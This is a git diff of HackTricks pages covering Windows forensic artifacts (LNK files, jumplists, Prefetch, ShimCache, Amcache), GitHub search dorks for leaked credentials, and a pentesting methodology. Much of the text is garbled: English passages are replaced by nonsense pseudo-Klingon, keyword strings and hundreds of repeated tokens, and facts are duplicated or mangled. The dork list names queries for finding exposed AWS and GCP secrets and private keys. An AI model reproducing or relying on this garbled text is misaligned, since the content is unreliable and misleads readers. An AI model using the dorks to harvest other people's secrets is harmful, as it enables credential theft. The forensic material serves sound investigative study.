1. FileModifiedDate
|
||||
2. FileAccessDate
|
||||
3. FileCreationDate
|
||||
1. FileModifiedDate
|
||||
2. FileAccessDate
|
||||
3. FileCreationDate
|
||||
* **Second Set:**
|
||||
1. LinkModifiedDate
|
||||
2. LinkAccessDate
|
||||
3. LinkCreationDate.
|
||||
1. LinkModifiedDate
|
||||
2. LinkAccessDate
|
||||
3. LinkCreationDate.
|
||||
|
||||
The first set of timestamp references the **timestamps of the file itself**. The second set references the **timestamps of the linked file**.
|
||||
|
||||
You can get the same information running the Windows CLI tool: [**LECmd.exe**](https://github.com/EricZimmerman/LECmd)
|
||||
**first set** **timestamp** **file itself**. **second set** **timestamps** **linked file**.
|
||||
|
||||
**same information** **Windows CLI tool** [**LECmd.exe**](https://github.com/EricZimmerman/LECmd) **running**.
|
||||
```
|
||||
LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
|
||||
```
|
||||
|
||||
In this case, the information is going to be saved inside a CSV file.
|
||||
|
||||
### Jumplists
|
||||
|
||||
These are the recent files that are indicated per application. It's the list of **recent files used by an application** that you can access on each application. They can be created **automatically or be custom**.
|
||||
|
||||
The **jumplists** created automatically are stored in `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`. The jumplists are named following the format `{id}.autmaticDestinations-ms` where the initial ID is the ID of the application.
|
||||
**jumplists** created automatically are stored in `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`. The jumplists are named following the format `{id}.autmaticDestinations-ms` where the initial ID is the ID of the application.
|
||||
|
||||
The custom jumplists are stored in `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` and they are created by the application usually because something **important** has happened with the file (maybe marked as favorite)
|
||||
|
||||
|
@ -128,10 +120,6 @@ The **created time** of any jumplist indicates the **the first time the file was
|
|||
|
||||
You can inspect the jumplists using [**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md).
|
||||
|
||||
![](<../../../.gitbook/assets/image (474).png>)
|
||||
|
||||
(_Note that the timestamps provided by JumplistExplorer are related to the jumplist file itself_)
|
||||
|
||||
### Shellbags
|
||||
|
||||
[**Follow this link to learn what are the shellbags.**](interesting-windows-registry-keys.md#shellbags)
|
||||
|
@ -146,8 +134,6 @@ It's possible to identify that a USB device was used thanks to the creation of:
|
|||
|
||||
Note that some LNK file instead of pointing to the original path, points to the WPDNSE folder:
|
||||
|
||||
![](<../../../.gitbook/assets/image (476).png>)
|
||||
|
||||
The files in the folder WPDNSE are a copy of the original ones, then won't survive a restart of the PC and the GUID is taken from a shellbag.
|
||||
|
||||
### Registry Information
|
||||
|
@ -158,14 +144,10 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi
|
|||
|
||||
Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`).
|
||||
|
||||
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
|
||||
|
||||
### USB Detective
|
||||
|
||||
[**USBDetective**](https://usbdetective.com) can be used to obtain information about the USB devices that have been connected to an image.
|
||||
|
||||
![](<../../../.gitbook/assets/image (483).png>)
|
||||
|
||||
### Plug and Play Cleanup
|
||||
|
||||
The scheduled task known as 'Plug and Play Cleanup' is primarily designed for the removal of outdated driver versions. Contrary to its specified purpose of retaining the latest driver package version, online sources suggest it also targets drivers that have been inactive for 30 days. Consequently, drivers for removable devices not connected in the past 30 days may be subject to deletion.
|
||||
|
@ -174,14 +156,13 @@ The task is located at the following path:
|
|||
`C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup`.
|
||||
|
||||
A screenshot depicting the task's content is provided:
|
||||
![](https://2.bp.blogspot.com/-wqYubtuR_W8/W19bV5S9XyI/AAAAAAAANhU/OHsBDEvjqmg9ayzdNwJ4y2DKZnhCdwSMgCLcBGAs/s1600/xml.png)
|
||||
|
||||
**Key Components and Settings of the Task:**
|
||||
- **pnpclean.dll**: This DLL is responsible for the actual cleanup process.
|
||||
- **UseUnifiedSchedulingEngine**: Set to `TRUE`, indicating the use of the generic task scheduling engine.
|
||||
- **MaintenanceSettings**:
|
||||
- **Period ('P1M')**: Directs the Task Scheduler to initiate the cleanup task monthly during regular Automatic maintenance.
|
||||
- **Deadline ('P2M')**: Instructs the Task Scheduler, if the task fails for two consecutive months, to execute the task during emergency Automatic maintenance.
|
||||
- **Period ('P1M')**: Directs the Task Scheduler to initiate the cleanup task monthly during regular Automatic maintenance.
|
||||
- **Deadline ('P2M')**: Instructs the Task Scheduler, if the task fails for two consecutive months, to execute the task during emergency Automatic maintenance.
|
||||
|
||||
This configuration ensures regular maintenance and cleanup of drivers, with provisions for reattempting the task in case of consecutive failures.
|
||||
|
||||
|
@ -196,8 +177,6 @@ Emails contain **2 interesting parts: The headers and the content** of the email
|
|||
|
||||
Also, inside the `References` and `In-Reply-To` headers you can find the ID of the messages:
|
||||
|
||||
![](<../../../.gitbook/assets/image (484).png>)
|
||||
|
||||
### Windows Mail App
|
||||
|
||||
This application saves emails in HTML or text. You can find the emails inside subfolders inside `\Users\<username>\AppData\Local\Comms\Unistore\data\3\`. The emails are saved with the `.dat` extension.
|
||||
|
@ -223,23 +202,20 @@ In the Microsoft Outlook client, all the sent/received messages, contacts data,
|
|||
The registry path `HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook` indicates the file that is being used.
|
||||
|
||||
You can open the PST file using the tool [**Kernel PST Viewer**](https://www.nucleustechnologies.com/es/visor-de-pst.html).
|
||||
|
||||
![](<../../../.gitbook/assets/image (485).png>)
|
||||
|
||||
### Microsoft Outlook OST Files
|
||||
|
||||
An **OST file** is generated by Microsoft Outlook when it's configured with **IMAP** or an **Exchange** server, storing similar information to a PST file. This file is synchronized with the server, retaining data for **the last 12 months** up to a **maximum size of 50GB**, and is located in the same directory as the PST file. To view an OST file, the [**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html) can be utilized.
|
||||
**OST file** jatlh Microsoft Outlook Daq configured **IMAP** or **Exchange** server, storing similar information to PST file. **12 cha'logh** **retaining data** **50GB maximum size** synchronized file, PST file directory. OST file, [**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html) can be utilized.
|
||||
|
||||
### Retrieving Attachments
|
||||
|
||||
Lost attachments might be recoverable from:
|
||||
|
||||
- For **IE10**: `%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook`
|
||||
- For **IE11 and above**: `%APPDATA%\Local\Microsoft\InetCache\Content.Outlook`
|
||||
- **IE10**: `%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook`
|
||||
- **IE11 and above**: `%APPDATA%\Local\Microsoft\InetCache\Content.Outlook`
|
||||
|
||||
### Thunderbird MBOX Files
|
||||
|
||||
**Thunderbird** utilizes **MBOX files** to store data, located at `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles`.
|
||||
**Thunderbird** **MBOX files** utilize data storage, located at `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles`.
|
||||
|
||||
### Image Thumbnails
|
||||
|
||||
|
@ -249,7 +225,7 @@ Lost attachments might be recoverable from:
|
|||
|
||||
### Windows Registry Information
|
||||
|
||||
The Windows Registry, storing extensive system and user activity data, is contained within files in:
|
||||
Windows Registry, storing extensive system and user activity data, contained within files in:
|
||||
|
||||
- `%windir%\System32\Config` for various `HKEY_LOCAL_MACHINE` subkeys.
|
||||
- `%UserProfile%{User}\NTUSER.DAT` for `HKEY_CURRENT_USER`.
|
||||
|
@ -310,11 +286,9 @@ The file name is created as `{program_name}-{hash}.pf` (the hash is based on the
|
|||
The file `C:\Windows\Prefetch\Layout.ini` contains the **names of the folders of the files that are prefetched**. This file contains **information about the number of the executions**, **dates** of the execution and **files** **open** by the program.
|
||||
|
||||
To inspect these files you can use the tool [**PEcmd.exe**](https://github.com/EricZimmerman/PECmd):
|
||||
|
||||
```bash
|
||||
.\PECmd.exe -d C:\Users\student\Desktop\Prefetch --html "C:\Users\student\Desktop\out_folder"
|
||||
```
|
||||
|
||||
![](<../../../.gitbook/assets/image (487).png>)
|
||||
|
||||
### Superprefetch
|
||||
|
@ -343,46 +317,38 @@ It gives the following information:
|
|||
This information is updated every 60 mins.
|
||||
|
||||
You can obtain the date from this file using the tool [**srum\_dump**](https://github.com/MarkBaggett/srum-dump).
|
||||
|
||||
```bash
|
||||
.\srum_dump.exe -i C:\Users\student\Desktop\SRUDB.dat -t SRUM_TEMPLATE.xlsx -o C:\Users\student\Desktop\srum
|
||||
```
|
||||
|
||||
### AppCompatCache (ShimCache)
|
||||
|
||||
The **AppCompatCache**, also known as **ShimCache**, forms a part of the **Application Compatibility Database** developed by **Microsoft** to tackle application compatibility issues. This system component records various pieces of file metadata, which include:
|
||||
**AppCompatCache**, jupwI' **ShimCache**, **Microsoft** qorDu' **Application Compatibility Database** vItlhutlh. vaj **file metadata** vItlhutlh:
|
||||
|
||||
- Full path of the file
|
||||
- Size of the file
|
||||
- Last Modified time under **$Standard\_Information** (SI)
|
||||
- Last Updated time of the ShimCache
|
||||
- Process Execution Flag
|
||||
- **file** **Full path**
|
||||
- **file** **Size**
|
||||
- **Last Modified time** **$Standard\_Information** (SI) Daq
|
||||
- **ShimCache** **Last Updated time**
|
||||
- **Process Execution Flag**
|
||||
|
||||
Such data is stored within the registry at specific locations based on the version of the operating system:
|
||||
vaj registry Daq vItlhutlh data stored vItlhutlh:
|
||||
|
||||
- For XP, the data is stored under `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` with a capacity for 96 entries.
|
||||
- For Server 2003, as well as for Windows versions 2008, 2012, 2016, 7, 8, and 10, the storage path is `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`, accommodating 512 and 1024 entries, respectively.
|
||||
- **XP** Daq, **data** stored **SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache** vItlhutlh, **96 entries** vItlhutlh.
|
||||
- **Server 2003**, **Windows versions 2008, 2012, 2016, 7, 8, vaj 10** Daq, **storage path** **SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache** vItlhutlh, **512 vaj 1024 entries** vItlhutlh.
|
||||
|
||||
To parse the stored information, the [**AppCompatCacheParser** tool](https://github.com/EricZimmerman/AppCompatCacheParser) is recommended for use.
|
||||
vItlhutlh **stored information** **parse** vaj, [**AppCompatCacheParser** tool](https://github.com/EricZimmerman/AppCompatCacheParser) **recommended** vItlhutlh.
|
||||
|
||||
![](<../../../.gitbook/assets/image (488).png>)
|
||||
|
||||
### Amcache
|
||||
|
||||
The **Amcache.hve** file is essentially a registry hive that logs details about applications that have been executed on a system. It is typically found at `C:\Windows\AppCompat\Programas\Amcache.hve`.
|
||||
**Amcache.hve** **file** **registry hive** vItlhutlh, **applications** **logs** **executed** **system**. **typically** **found** **C:\Windows\AppCompat\Programas\Amcache.hve**.
|
||||
|
||||
This file is notable for storing records of recently executed processes, including the paths to the executable files and their SHA1 hashes. This information is invaluable for tracking the activity of applications on a system.
|
||||
|
||||
To extract and analyze the data from **Amcache.hve**, the [**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser) tool can be used. The following command is an example of how to use AmcacheParser to parse the contents of the **Amcache.hve** file and output the results in CSV format:
|
||||
**file** **notable** **records** **recently executed processes**, **paths** **executable files** **SHA1 hashes**. **information** **invaluable** **tracking** **activity** **applications** **system**.
|
||||
|
||||
**extract** **analyze** **data** **Amcache.hve**, [**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser) **tool** **used**. **following command** **example** **AmcacheParser** **parse** **contents** **Amcache.hve** **file** **output** **results** **CSV format**:
|
||||
```bash
|
||||
AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\genericUser\Desktop\outputFolder
|
||||
```
|
||||
|
||||
Among the generated CSV files, the `Amcache_Unassociated file entries` is particularly noteworthy due to the rich information it provides about unassociated file entries.
|
||||
|
||||
The most interesting CVS file generated is the `Amcache_Unassociated file entries`.
|
||||
|
||||
### RecentFileCache
|
||||
|
||||
This artifact can only be found in W7 in `C:\Windows\AppCompat\Programs\RecentFileCache.bcf` and it contains information about the recent execution of some binaries.
|
||||
|
@ -501,7 +467,6 @@ Recorded by EventID 4616, changes to system time can complicate forensic analysi
|
|||
#### USB Device Tracking
|
||||
|
||||
Useful System EventIDs for USB device tracking include 20001/20003/10000 for initial use, 10100 for driver updates, and EventID 112 from DeviceSetupManager for insertion timestamps.
|
||||
|
||||
#### System Power Events
|
||||
|
||||
EventID 6005 indicates system startup, while EventID 6006 marks shutdown.
|
||||
|
|
|
@ -28,7 +28,7 @@ Other ways to support HackTricks:
|
|||
|
||||
### **Access Time Tracking**
|
||||
- By default, the last access time tracking is turned off (**`NtfsDisableLastAccessUpdate=1`**). To enable it, use:
|
||||
`fsutil behavior set disablelastaccess 0`
|
||||
`fsutil behavior set disablelastaccess 0`
|
||||
|
||||
### Windows Versions and Service Packs
|
||||
- The **Windows version** indicates the edition (e.g., Home, Pro) and its release (e.g., Windows 10, Windows 11), while **Service Packs** are updates that include fixes and, sometimes, new features.
|
||||
|
|
|
@ -1,5 +1,3 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
@ -128,20 +126,3 @@ This is run from **userinit.exe** which should be terminated, so **no parent** s
|
|||
* Is running under the expected SID?
|
||||
* Is the parent process the expected one (if any)?
|
||||
* Are the children processes the expecting ones? (no cmd.exe, wscript.exe, powershell.exe..?)
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
|
@ -40,7 +40,6 @@ Now that we have built the list of assets of our scope it's time to search for s
|
|||
* [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker)
|
||||
|
||||
### **Dorks**
|
||||
|
||||
```bash
|
||||
".mlab.com password"
|
||||
"access_key"
|
||||
|
@ -322,7 +321,6 @@ GCP SECRET
|
|||
AWS SECRET
|
||||
"private" extension:pgp
|
||||
```
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
|
|
@ -1,43 +1,43 @@
|
|||
# Wide Source Code Search
|
||||
# QaD jImej
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>! </strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>ghItlhvam AWS hacking jImej</strong></a> jImejnIS.</summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
HackTricks qIpDI'wI'vam jImej:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* **HackTricks vItlhutlh** pe'vIl **company advertise** 'ej **HackTricks PDF download** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) **chaw'}'a'**.
|
||||
* [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **ghItlhvam**.
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) **ghItlhvam** [**NFTs**](https://opensea.io/collection/the-peass-family) **ghItlhvam**.
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) **telegram group**](https://t.me/peass) **follow** **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
The goal of this page is to enumerate **platforms that allow to search for code** (literal or regex) in across thousands/millions of repos in one or more platforms.
|
||||
jImejvam'e' vItlhutlh **platforms that allow to search for code** (literal or regex) **repos thousands/millions** platforms.
|
||||
|
||||
This helps in several occasions to **search for leaked information** or for **vulnerabilities** patterns.
|
||||
**Search for leaked information** **vulnerabilities** patterns **search** several occasions **helps**.
|
||||
|
||||
* [**SourceGraph**](https://sourcegraph.com/search): Search in millions of repos. There is a free version and an enterprise version (with 15 days free). It supports regexes.
|
||||
* [**Github Search**](https://github.com/search): Search across Github. It supports regexes.
|
||||
* Maybe it's also useful to check also [**Github Code Search**](https://cs.github.com/).
|
||||
* [**Gitlab Advanced Search**](https://docs.gitlab.com/ee/user/search/advanced\_search.html): Search across Gitlab projects. Support regexes.
|
||||
* [**SearchCode**](https://searchcode.com/): Search code in millions of projects.
|
||||
* [**SourceGraph**](https://sourcegraph.com/search): **Search millions repos**. **free version** **enterprise version** (15 days free). **regexes** support.
|
||||
* [**Github Search**](https://github.com/search): **Search Github**. **regexes** support.
|
||||
* **Github Code Search**](https://cs.github.com/) **useful** check also.
|
||||
* [**Gitlab Advanced Search**](https://docs.gitlab.com/ee/user/search/advanced\_search.html): **Search Gitlab projects**. **regexes** Support.
|
||||
* [**SearchCode**](https://searchcode.com/): **Search code millions projects**.
|
||||
|
||||
{% hint style="warning" %}
|
||||
When you look for leaks in a repo and run something like `git log -p` don't forget there might be **other branches with other commits** containing secrets!
|
||||
**git log -p** **run** repo **leaks** **look** **don't forget** **other branches with other commits** containing secrets!
|
||||
{% endhint %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>! </strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>ghItlhvam AWS hacking jImej</strong></a> jImejnIS.</summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
HackTricks qIpDI'wI'vam jImej:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* **HackTricks vItlhutlh** pe'vIl **company advertise** 'ej **HackTricks PDF download** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) **chaw'}'a'**.
|
||||
* [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **ghItlhvam**.
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) **ghItlhvam** [**NFTs**](https://opensea.io/collection/the-peass-family) **ghItlhvam**.
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) **telegram group**](https://t.me/peass) **follow** **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks AWS Red Team Expert</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
|
@ -93,84 +93,13 @@ If you have troubles with the shell, you can find here a small **compilation of
|
|||
* [**Linux**](../linux-hardening/useful-linux-commands/)
|
||||
* [**Windows (CMD)**](../windows-hardening/basic-cmd-for-pentesters.md)
|
||||
* [**Winodows (PS)**](../windows-hardening/basic-powershell-for-pentesters/)
|
||||
### **9 -** [**Qa'vIn**](exfiltration.md)
|
||||
|
||||
### **9 -** [**Exfiltration**](exfiltration.md)
|
||||
**Qa'vIn** **vItlhutlh** **vItlhutlh** **vItlhutlh** **(ghorgh privilege escalation scripts)**. **ghaH** [**post about common tools that you can use with these purposes**](exfiltration.md)**.**
|
||||
|
||||
You will probably need to **extract some data from the victim** or even **introduce something** (like privilege escalation scripts). **Here you have a** [**post about common tools that you can use with these purposes**](exfiltration.md)**.**
|
||||
|
||||
### **10- Privilege Escalation**
|
||||
### **10- Qa'vIn**
|
||||
|
||||
#### **10.1- Local Privesc**
|
||||
|
||||
If you are **not root/Administrator** inside the box, you should find a way to **escalate privileges.**\
|
||||
Here you can find a **guide to escalate privileges locally in** [**Linux**](../linux-hardening/privilege-escalation/) **and in** [**Windows**](../windows-hardening/windows-local-privilege-escalation/)**.**\
|
||||
You should also check this pages about how does **Windows work**:
|
||||
|
||||
* [**Authentication, Credentials, Token privileges and UAC**](../windows-hardening/authentication-credentials-uac-and-efs.md)
|
||||
* How does [**NTLM works**](../windows-hardening/ntlm/)
|
||||
* How to [**steal credentials**](broken-reference/) in Windows
|
||||
* Some tricks about [_**Active Directory**_](../windows-hardening/active-directory-methodology/)
|
||||
|
||||
**Don't forget to checkout the best tools to enumerate Windows and Linux local Privilege Escalation paths:** [**Suite PEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)
|
||||
|
||||
#### **10.2- Domain Privesc**
|
||||
|
||||
Here you can find a [**methodology explaining the most common actions to enumerate, escalate privileges and persist on an Active Directory**](../windows-hardening/active-directory-methodology/). Even if this is just a subsection of a section, this process could be **extremely delicate** on a Pentesting/Red Team assignment.
|
||||
|
||||
### 11 - POST
|
||||
|
||||
#### **11**.1 - Looting
|
||||
|
||||
Check if you can find more **passwords** inside the host or if you have **access to other machines** with the **privileges** of your **user**.\
|
||||
Find here different ways to [**dump passwords in Windows**](broken-reference/).
|
||||
|
||||
#### 11.2 - Persistence
|
||||
|
||||
**Use 2 o 3 different types of persistence mechanism so you won't need to exploit the system again.**\
|
||||
**Here you can find some** [**persistence tricks on active directory**](../windows-hardening/active-directory-methodology/#persistence)**.**
|
||||
|
||||
TODO: Complete persistence Post in Windows & Linux 
|
||||
|
||||
### 12 - Pivoting
|
||||
|
||||
With the **gathered credentials** you could have access to other machines, or maybe you need to **discover and scan new hosts** (start the Pentesting Methodology again) inside new networks where your victim is connected.\
|
||||
In this case tunnelling could be necessary. Here you can find [**a post talking about tunnelling**](tunneling-and-port-forwarding.md).\
|
||||
You definitely should also check the post about [Active Directory pentesting Methodology](../windows-hardening/active-directory-methodology/). There you will find cool tricks to move laterally, escalate privileges and dump credentials.\
|
||||
Check also the page about [**NTLM**](../windows-hardening/ntlm/), it could be very useful to pivot on Windows environments..
|
||||
|
||||
### MORE
|
||||
|
||||
#### [Android Applications](../mobile-pentesting/android-app-pentesting/)
|
||||
|
||||
#### **Exploiting**
|
||||
|
||||
* [**Basic Linux Exploiting**](../exploiting/linux-exploiting-basic-esp/)
|
||||
* [**Basic Windows Exploiting**](../exploiting/windows-exploiting-basic-guide-oscp-lvl.md)
|
||||
* [**Basic exploiting tools**](../exploiting/tools/)
|
||||
|
||||
#### [**Basic Python**](python/)
|
||||
|
||||
#### **Crypto tricks**
|
||||
|
||||
* [**ECB**](../cryptography/electronic-code-book-ecb.md)
|
||||
* [**CBC-MAC**](../cryptography/cipher-block-chaining-cbc-mac-priv.md)
|
||||
* [**Padding Oracle**](../cryptography/padding-oracle-priv.md)
|
||||
|
||||
<img src="../.gitbook/assets/i3.png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
**root/Administrator** **ghorgh** **'e' vItlhutlh** **ghorgh** **vItlhutlh**.\
|
||||
**'ej** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** **'e'** 